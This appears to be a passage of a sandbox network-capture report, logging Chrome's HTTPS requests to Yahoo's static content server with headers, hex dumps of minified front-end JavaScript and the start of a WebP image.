                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 28 76 6f 69 64 20 30 3d 3d 3d 6f 29 7b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 65 28 69 2c 6e 2c 72 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 6f 29 72 65 74 75 72 6e 20 6f 2e 76 61 6c 75 65 3b 76 61 72 20 61 3d 6f 2e 67 65 74 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 29 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 72 29 7d 2c 76 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 70 3d 76 2e 62 61 73 65 2c 6d 3d 76 2e 63 6f 6e 73 74 61 6e 74 73 2c 64 3d 76 2e 57 61 66 65 72 42 61 73 65 43 6c 61 73 73 2c 68 3d 76 2e 75 74 69 6c 73 2c 79 3d 68 2e 63 6f 6e 76 65 72 74 4e 6f 64 65 4c 69 73 74 54 6f 41 72 72 61 79 2c 62 3d 68 2e 66 69 6e 64 41 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (void 0===o){var i=Object.getPrototypeOf(t);return null===i?void 0:e(i,n,r)}if("value"in o)return o.value;var a=o.get;if(void 0!==a)return a.call(r)},v=window.wafer,p=v.base,m=v.constants,d=v.WaferBaseClass,h=v.utils,y=h.convertNodeListToArray,b=h.findAnc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 65 22 2c 22 6d 65 6e 75 69 74 65 6d 22 29 7d 29 3b 76 61 72 20 70 3d 69 2e 69 64 3b 70 26 26 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 2c 70 29 3b 76 61 72 20 6d 3d 73 2e 69 64 3b 72 65 74 75 72 6e 20 6d 26 26 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 2c 6d 29 2c 6e 7d 72 65 74 75 72 6e 20 69 28 74 2c 65 29 2c 63 28 74 2c 5b 7b 6b 65 79 3a 22 6f 70 65 6e 4d 65 6e 75 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2c 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 6e 3d 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e","menuitem")});var p=i.id;p&&s.setAttribute("aria-controls",p);var m=s.id;return m&&i.setAttribute("aria-labelledby",m),n}return i(t,e),c(t,[{key:"openMenu",value:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0],t=this._util,n=t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 65 6e 75 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 6e 3d 74 2e 6f 70 74 69 6f 6e 73 45 6c 65 6d 2c 72 3d 74 2e 63 6c 6f 73 65 4f 6e 53 65 6c 65 63 74 2c 6f 3d 65 2e 65 76 65 6e 74 54 61 72 67 65 74 3b 79 28 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 6d 65 6e 75 2d 69 74 65 6d 2d 61 63 74 69 76 65 22 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 6d 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ototypeOf(t.prototype),"addEventListeners",this).call(this)}},{key:"menuClick",value:function(e){var t=this._util,n=t.optionsElem,r=t.closeOnSelect,o=e.eventTarget;y(n.getElementsByClassName("menu-item-active")).forEach(function(e){e.classList.remove("men
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 2e 6c 65 6e 67 74 68 29 3b 76 61 72 20 69 3d 72 5b 6f 2d 31 5d 3b 28 67 28 69 29 5b 30 5d 7c 7c 69 29 2e 66 6f 63 75 73 28 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 4f 76 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 5f 73 74 61 74 65 2e 61 63 74 69 76 65 29 7b 74 68 69 73 2e 5f 75 74 69 6c 2e 73 68 6f 75 6c 64 41 63 74 69 76 61 74 65 4f 6e 48 6f 76 65 72 26 26 74 68 69 73 2e 6f 70 65 6e 4d 65 6e 75 28 21 30 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 4c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 61 63 74 69 76 65 29 7b 74 68 69 73 2e 5f 75 74 69 6c 2e 73 68 6f 75 6c 64 41 63 74 69 76 61 74 65 4f 6e 48 6f 76 65 72 26 26 74 68 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .length);var i=r[o-1];(g(i)[0]||i).focus()}}},{key:"mouseOver",value:function(){if(!this._state.active){this._util.shouldActivateOnHover&&this.openMenu(!0)}}},{key:"mouseLeave",value:function(e){if(this._state.active){this._util.shouldActivateOnHover&&thi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC556INData Raw: 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 7b 72 6f 6f 74 3a 69 2c 73 65 6c 65 63 74 6f 72 3a 75 2c 57 61 66 65 72 43 6c 61 73 73 3a 6a 7d 29 29 2c 63 3d 6c 3b 72 65 74 75 72 6e 20 6a 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 6f 73 65 4f 74 68 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 2c 74 3d 63 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 6e 3d 21 30 2c 72 3d 21 31 2c 6f 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 69 2c 61 3d 74 2e 65 6e 74 72 69 65 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 69 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 6e 3d 21 30 29 7b 76 61 72 20 73 3d 69 2e 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ypeOf(t)).call(this,{root:i,selector:u,WaferClass:j})),c=l;return j.prototype.closeOthers=function(){var e=this._util.elem,t=c._state.elementInstances,n=!0,r=!1,o=void 0;try{for(var i,a=t.entries()[Symbol.iterator]();!(n=(i=a.next()).done);n=!0){var s=i.v


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              145192.168.2.45116287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC412OUTGET /aaq/fp/js/react-wafer-stream.custom.modern.1ed4fe71b1fc647ddbf37a7050944309.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: a4Uv9adslPNGjOVcpaRm0B3WrPD7Jxk84WWyTpSXEkq5BEeDfEv86BT5Gi+f+9psE/jzOGbzi7o=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: DQNWCHSS0WMPZ72D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 29 Sep 2024 21:31:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Dec 2023 00:17:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "1ed4fe71b1fc647ddbf37a7050944309"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: xy7lqotFC.zmCqihzzE4iOckpJX.wEX6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 769334
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 77 69 6e 64 6f 77 2e 77 61 66 65 72 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 73 68 6f 77 2d 64 72 61 77 65 72 22 2c 74 3d 6e 75 6c 6c 2c 61 3d 6e 75 6c 6c 2c 72 3d 22 77 61 66 65 72 2d 66 65 74 63 68 2d 65 72 72 6f 72 22 2c 69 3d 22 77 61 66 65 72 2d 66 65 74 63 68 2d 63 6f 6d 70 6c 65 74 65 22 2c 6e 3d 22 73 74 72 65 61 6d 2d 72 65 6c 61 74 65 64 2d 64 72 61 77 65 72 22 2c 6f 3d 22 53 74 72 65 61 6d 52 65 6c 61 74 65 64 22 2c 73 3d 22 72 65 61 63 74 2d 77 61 66 65 72 2d 73 74 72 65 61 6d 22 2c 63 3d 22 6a 73 6f 6e 22 2c 64 3d 22 77 61 66 65 72 2d 66 65 74 63 68 22 2c 6c 3d 22 73 74 72 65 61 6d 2d 75 75 69 64 2d 6c 69 73 74 22 2c 75 3d 5b 5d 2c 77 3d 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: window.wafer&&window.wafer.ready((function(){var e="show-drawer",t=null,a=null,r="wafer-fetch-error",i="wafer-fetch-complete",n="stream-related-drawer",o="StreamRelated",s="react-wafer-stream",c="json",d="wafer-fetch",l="stream-uuid-list",u=[],w=document.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 52 65 61 64 65 72 2d 6f 70 65 6e 22 29 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2e 6c 6f 63 6b 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 4d 61 69 6e 56 69 65 77 22 29 29 2c 77 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 54 6f 28 30 2c 30 29 29 2c 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 73 74 72 65 61 6d 2d 62 61 74 63 68 2d 66 65 74 63 68 22 29 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 6a 73 2d 64 69 73 70 6c 61 79 2d 63 61 72 64 20 75 6e 70 72 6f 63 65 73 73 65 64 2d 64 69 73 70 6c 61 79 2d 63 61 72 64 22 29 3b 61 2e 6c 65 6e 67 74 68 26 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Element.classList.add("Reader-open"),window.wafer.base.lock(document.getElementById("MainView")),window.scrollTo(0,0)),t.classList.contains("stream-batch-fetch")){var a=document.getElementsByClassName("js-display-card unprocessed-display-card");a.length&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 77 69 6e 64 6f 77 2e 44 41 52 4c 41 2e 61 64 64 50 6f 73 28 6f 29 3b 76 61 72 20 73 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 44 41 52 4c 41 2e 52 65 73 70 6f 6e 73 65 28 22 52 45 53 45 52 56 45 4d 4f 4d 45 4e 54 53 22 2c 7b 7d 29 3b 69 3d 75 6e 65 73 63 61 70 65 28 69 29 2c 73 2e 61 64 64 28 22 52 45 53 45 52 56 45 4d 4f 4d 45 4e 54 53 22 2c 69 29 2c 77 69 6e 64 6f 77 2e 44 41 52 4c 41 2e 72 65 6e 64 65 72 28 73 29 7d 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 29 7b 41 2e 63 6f 6e 76 65 72 74 4e 6f 64 65 4c 69 73 74 54 6f 41 72 72 61 79 28 77 29 2e 66 69 6c 74 65 72 28 28 65 3d 3e 21 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 69 6e 69 74 2d 76 69 73 69 74 65 64 22 29 29 29 2e 66 6f 72 45 61 63 68 28 28 6c 3d 3e 7b 6c 2e 63 6c 61 73 73 4c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: window.DARLA.addPos(o);var s=new window.DARLA.Response("RESERVEMOMENTS",{});i=unescape(i),s.add("RESERVEMOMENTS",i),window.DARLA.render(s)}}};function L(){A.convertNodeListToArray(w).filter((e=>!e.classList.contains("init-visited"))).forEach((l=>{l.classL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 72 20 70 3d 53 28 29 2c 76 3d 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 26 26 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 63 6f 6e 74 65 78 74 7c 7c 7b 7d 2c 4c 3d 7b 63 6f 6e 66 69 67 3a 7b 6c 65 61 64 49 74 65 6d 55 75 69 64 3a 67 7c 7c 66 7d 2c 63 74 72 6c 3a 6f 2c 6c 61 6e 67 3a 76 2e 6c 61 6e 67 2c 6d 5f 69 64 3a 73 2c 6d 5f 6d 6f 64 65 3a 63 2c 72 65 67 69 6f 6e 3a 76 2e 72 65 67 69 6f 6e 2c 73 69 74 65 3a 76 2e 73 69 74 65 7d 3b 63 6f 6e 73 74 20 6e 3d 76 2e 70 61 72 74 6e 65 72 2c 6c 3d 7b 64 65 64 75 70 55 75 69 64 73 3a 70 2e 64 65 64 75 70 55 75 69 64 73 2e 6a 6f 69 6e 28 22 2c 22 29 2c 75 75 69 64 3a 66 7d 3b 76 61 72 20 45 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 66 67 22 29 3b 69 66 28 45 29 7b 76 61 72 20 68 3d 6d 2e 67 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r p=S(),v=window.YAHOO&&window.YAHOO.context||{},L={config:{leadItemUuid:g||f},ctrl:o,lang:v.lang,m_id:s,m_mode:c,region:v.region,site:v.site};const n=v.partner,l={dedupUuids:p.dedupUuids.join(","),uuid:f};var E=a.getAttribute("data-cfg");if(E){var h=m.ge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 26 41 2e 63 6f 6e 76 65 72 74 4e 6f 64 65 4c 69 73 74 54 6f 41 72 72 61 79 28 4c 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 67 26 26 65 3f 70 28 65 29 3a 65 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 7d 29 29 7d 29 29 7d 69 66 28 77 26 26 77 2e 6c 65 6e 67 74 68 29 7b 4c 28 29 3b 76 61 72 20 45 2c 68 2c 79 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 63 72 6f 6c 6c 61 62 6c 65 2d 73 6d 61 64 22 29 2c 4e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 63 72 6f 6c 6c 61 62 6c 65 2d 76 69 64 65 6f 22 29 2c 52 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &A.convertNodeListToArray(L).forEach((function(e){g&&e?p(e):e.style.display="none"}))}))}if(w&&w.length){L();var E,h,y=document.getElementById("scrollable-smad"),N=document.getElementById("scrollable-video"),R=window.innerHeight||document.documentElement.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 28 71 28 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 37 35 29 2c 7b 75 73 65 4e 61 76 69 67 61 74 6f 72 3a 21 31 7d 29 2c 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 37 35 3d 6e 75 6c 6c 29 3a 61 3e 3d 35 30 26 26 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 35 30 3f 28 41 2e 66 69 72 65 42 65 61 63 6f 6e 28 71 28 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 35 30 29 2c 7b 75 73 65 4e 61 76 69 67 61 74 6f 72 3a 21 31 7d 29 2c 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 35 30 3d 6e 75 6c 6c 29 3a 61 3e 3d 32 35 26 26 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 32 35 3f 28 41 2e 66 69 72 65 42 65 61 63 6f 6e 28 71 28 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 32 35 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (q(b.quartileActionUrl75),{useNavigator:!1}),b.quartileActionUrl75=null):a>=50&&b.quartileActionUrl50?(A.fireBeacon(q(b.quartileActionUrl50),{useNavigator:!1}),b.quartileActionUrl50=null):a>=25&&b.quartileActionUrl25?(A.fireBeacon(q(b.quartileActionUrl25)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC454INData Raw: 26 65 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 73 74 72 65 61 6d 2d 76 69 64 65 6f 2d 61 64 2d 76 32 22 29 26 26 65 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 22 29 7d 29 29 3b 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 6f 6e 28 22 74 6f 67 67 6c 65 3a 63 68 61 6e 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 26 26 65 2e 6d 65 74 61 26 26 65 2e 65 6c 65 6d 29 7b 76 61 72 20 74 3d 65 2e 65 6c 65 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 66 2d 74 6f 67 67 6c 65 2d 74 61 72 67 65 74 22 29 3b 22 73 68 6f 77 2d 64 72 61 77 65 72 22 3d 3d 3d 65 2e 6d 65 74 61 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &e.elem.parentNode.classList.contains("stream-video-ad-v2")&&e.elem.parentNode.classList.add("video-endcard")}));window.wafer.on("toggle:change",(function(e){if(e&&e.meta&&e.elem){var t=e.elem.getAttribute("data-wf-toggle-target");"show-drawer"===e.meta.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              146192.168.2.45116987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC747OUTGET /uu/api/res/1.2/PpsenWo6Y0lPNzxwf.B21w--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/billboard_547/b0d8c85d9f4a0d173b86d5606d37a033.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 21524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="b0d8c85d9f4a0d173b86d5606d37a033.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "5e489637543881fcb027410794eb1483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Sun, 06 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 07 Oct 2024 17:23:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 17:25:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=70;cpu=0;start=2024-10-07T17:25:27.538Z;desc=miss,rtt;dur=89,content-info;desc="width=536,height=284,bytes=21524,owidth=1548,oheight=1024,obytes=431439,ef=(1,13,17,23,30)",cloudinary;dur=62;start=2024-10-07T17:25:27.542Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: a0381c8f76e4e8e697edce1131d7c8e1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 92898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 52 49 46 46 0c 54 00 00 57 45 42 50 56 50 38 20 00 54 00 00 f0 6e 01 9d 01 2a 18 02 1c 01 3e 79 34 95 47 a4 a3 24 a5 2c 13 cc 70 a0 0f 09 66 6e 48 13 1d 8b 62 5d bc 04 04 65 57 27 5d 38 84 f3 5f e1 3f 77 3f c1 fb be 71 6f 5e fe a0 fb 77 f9 0f f9 5f e0 7d d0 78 0f d5 bf b3 3e 98 fe 7f fc 0f fe 9f f3 1e cf bf d8 fe cf fb ac fd 31 ff b3 f3 ff e8 23 fa 0f f7 bf d9 2e b8 7f ba ff 8d df 05 ff 73 7f 70 fd d5 3f e9 fe f2 fb cf fe a7 ea 37 fd 2b fd 6f ff fe c7 3f 44 cf 37 4f fc bf bc bf 0f bf d7 3f ea 7e e1 fb 5c 7f ff c2 fd e5 4f f0 3c 37 f3 77 f4 5f e1 ff 78 b9 8d f6 97 9a 7f cf 3f 51 c8 07 d0 3d 4b 3d db c2 83 d9 71 12 d0 de 56 fd 15 fd 47 d8 5f f5 3f a5 77 fe 9e 83 7e c0 f6 10 fd 83 eb 51 fb c3 ec fb fb 74 2f c7 0f d3 ad b0 26 68 5b 0d 68 d0 6a a7 9b 7a fb 3f
